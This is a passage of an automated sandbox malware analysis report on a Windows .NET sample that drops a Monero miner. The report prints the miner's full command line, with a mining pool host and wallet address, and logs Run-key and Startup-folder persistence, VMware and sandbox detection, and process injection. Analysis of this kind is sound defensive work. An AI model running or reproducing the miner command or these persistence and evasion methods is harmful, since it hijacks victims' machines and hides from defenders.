        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC31880_2_02EC3188
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC31780_2_02EC3178
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC410A0_2_02EC410A
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC41100_2_02EC4110
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02ECB6280_2_02ECB628
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC36000_2_02EC3600
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC2F410_2_02EC2F41
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC2F500_2_02EC2F50
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02ECA4E80_2_02ECA4E8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02ECA4D80_2_02ECA4D8
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC35F00_2_02EC35F0
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC6DA10_2_02EC6DA1
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC1D410_2_02EC1D41
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC1D500_2_02EC1D50
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000326A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.424543381.0000000001229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000000.387255397.0000000000A92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZMm7.exe@ vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000009.00000002.469097025.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 0000000A.00000002.492222164.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exeBinary or memory string: OriginalFilenameZMm7.exe@ vs Vsob3IooE7.exe
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
        Source: Vsob3IooE7.exeReversingLabs: Detection: 21%
        Source: Vsob3IooE7.exeVirustotal: Detection: 23%
        Source: Vsob3IooE7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe C:\Users\user\Desktop\Vsob3IooE7.exe
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vsob3IooE7.exe.logJump to behavior
        Source: classification engineClassification label: mal100.expl.evad.mine.winEXE@13/3@1/1
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: Vsob3IooE7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: Vsob3IooE7.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: Vsob3IooE7.exeStatic file information: File size 2842624 > 1048576
        Source: Vsob3IooE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Vsob3IooE7.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2b5600
        Source: Vsob3IooE7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Vsob3IooE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: Cassa.pdb source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: Cassa.pdbSHA256 source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: ZMm7.pdbSHA256#:=v source: Vsob3IooE7.exe
        Source: Binary string: ZMm7.pdb source: Vsob3IooE7.exe
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC086C pushad ; iretd 0_2_02EC086D
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeCode function: 0_2_02EC8D7C pushfd ; ret 0_2_02EC8D85
        Source: Driver.exe.5.drStatic PE information: section name: .MPRESS1
        Source: Driver.exe.5.drStatic PE information: section name: .MPRESS2
        Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
        Source: Driver.exe.5.drStatic PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
        Source: Vsob3IooE7.exeStatic PE information: real checksum: 0x0 should be: 0x2c0932
        Source: Vsob3IooE7.exeStatic PE information: 0xA019F57F [Fri Feb 12 14:36:47 2055 UTC]
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeFile created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeJump to dropped file
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: Vsob3IooE7.exe PID: 1796, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe TID: 7152Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
        Source: Vsob3IooE7.exe, 00000005.00000003.807995083.0000000001476000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c-
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeMemory written: C:\Users\user\Desktop\Vsob3IooE7.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\Desktop\Vsob3IooE7.exe {path}Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Users\user\Desktop\Vsob3IooE7.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
